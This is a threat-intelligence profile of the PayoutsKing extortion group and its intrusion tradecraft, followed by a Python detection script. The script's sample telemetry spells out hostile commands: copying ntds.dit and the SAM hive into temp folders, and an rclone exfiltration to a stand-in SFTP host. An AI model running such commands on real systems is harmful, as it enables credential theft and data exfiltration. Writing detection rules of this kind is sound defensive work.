Summary
GOLD ENCOUNTER is a cybercriminal threat group that operates the PayoutsKing double extortion operation, stealing data and encrypting files before demanding a ransom payment from victims. According to the PayoutsKing leak site, on which the group started to name victims in July 2025, the scheme is not operated as a ransomware-as-a-service (RaaS), meaning that it does not use affiliates to deploy ransomware. After an initial spike of naming 22 victims in July, GOLD ENCOUNTER has continued to list victim names at a rate of around five a month.
CTU researchers have observed multiple incidents involving PayoutsKing operators. Initial access has been gained by targeting Cisco or SonicWall SSL VPN devices, exploiting a SolarWinds Web Help Desk vulnerability, or email bombing leading to Microsoft Teams vishing. The QuickAssist and SuperOps remote monitoring and management (RMM) tools have then been deployed for remote access to victim environments. The group has also used a DLL sideloading technique to launch the Havoc C2 post-exploitation framework, and establishes an SSH backdoor via AdaptixC2 or OpenSSH. CTU researchers have also seen evidence of possible WebDAV abuse for accessing remote resources and the execution of a QEMU instance to run a virtual hard disk image containing attacker tooling. For credential harvesting, the group copies NTDS.dit and the SAM and SYSTEM hives to temporary directories via SMB using the 'print' command. The group also attempts to kill antivirus (AV) and endpoint detection and response (EDR) solutions using a bring your own vulnerable driver (BYOVD) technique. Before deploying ransomware, GOLD ENCOUNTER exfiltrates data to a remote SFTP location using WinSCP and Rclone.
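As an added illustration (not part of the CTU profile), the following Python triage helper matches process-creation command lines against three of the behaviours described above: copies of NTDS.dit or the SAM/SYSTEM hives into temporary directories, Rclone or WinSCP invoked with an SFTP destination, and QEMU started with a disk image. The regular expressions and the sample records are assumptions constructed for the example, not indicators from the incidents.

```python
"""Triage helper matching process-creation telemetry against the tradecraft in
the profile above. All records below are constructed samples, not real logs."""
import re

# Each rule maps to a behaviour the profile describes. The patterns are assumptions
# about how those actions commonly appear on a command line, not observed IoCs.
RULES = {
    # NTDS.dit or the SAM/SYSTEM registry hives being read or copied
    "credential_store_copy": re.compile(
        r"ntds\.dit|\\config\\(sam|system)(?![\w.])", re.I),
    # Rclone or WinSCP invoked with an SFTP destination
    "sftp_exfil_tool": re.compile(r"\b(rclone|winscp)(\.exe)?\b.*\bsftp\b", re.I),
    # QEMU started with a disk image, as used to run attacker tooling in a VM
    "qemu_disk_image": re.compile(
        r"\bqemu(-system-\w+)?(\.exe)?\b.*\.(vhdx?|qcow2|img)\b", re.I),
}
TEMP_DEST = re.compile(r"\\temp\\|\\tmp\\|%temp%", re.I)

def classify(cmdline: str) -> list[dict]:
    """Return one finding per matching rule; a credential store copied into a
    temporary directory is escalated because that is the pattern described."""
    findings = []
    for name, rx in RULES.items():
        if rx.search(cmdline):
            escalate = name == "credential_store_copy" and TEMP_DEST.search(cmdline)
            findings.append({"rule": name, "severity": "high" if escalate else "medium"})
    return findings

def triage(records: list[dict]) -> list[dict]:
    """Flatten findings across hosts for analyst review."""
    return [{"host": r["host"], **f} for r in records for f in classify(r["cmdline"])]

SAMPLE_RECORDS = [  # constructed telemetry, not from any real incident
    {"host": "dc01", "cmdline": r"copy \\dc01\c$\Windows\NTDS\ntds.dit \\dc01\c$\Windows\Temp\n.dat"},
    {"host": "dc01", "cmdline": r"copy C:\Windows\System32\config\SAM C:\Temp\s.sav"},
    {"host": "fs02", "cmdline": r"rclone.exe copy D:\Shares\Finance :sftp:/in --sftp-host 203.0.113.10"},
    {"host": "ws07", "cmdline": r"qemu-system-x86_64.exe -m 4096 -drive file=C:\Users\Public\tools.vhd"},
    {"host": "ws07", "cmdline": r"copy C:\Users\sam\report.docx C:\Temp\report.docx"},  # benign
    {"host": "fs02", "cmdline": r"rclone.exe sync C:\Backups onedrive:/backups"},        # benign
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

The two benign records show the rules keying on the hive path and the SFTP backend rather than on file or tool names alone.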
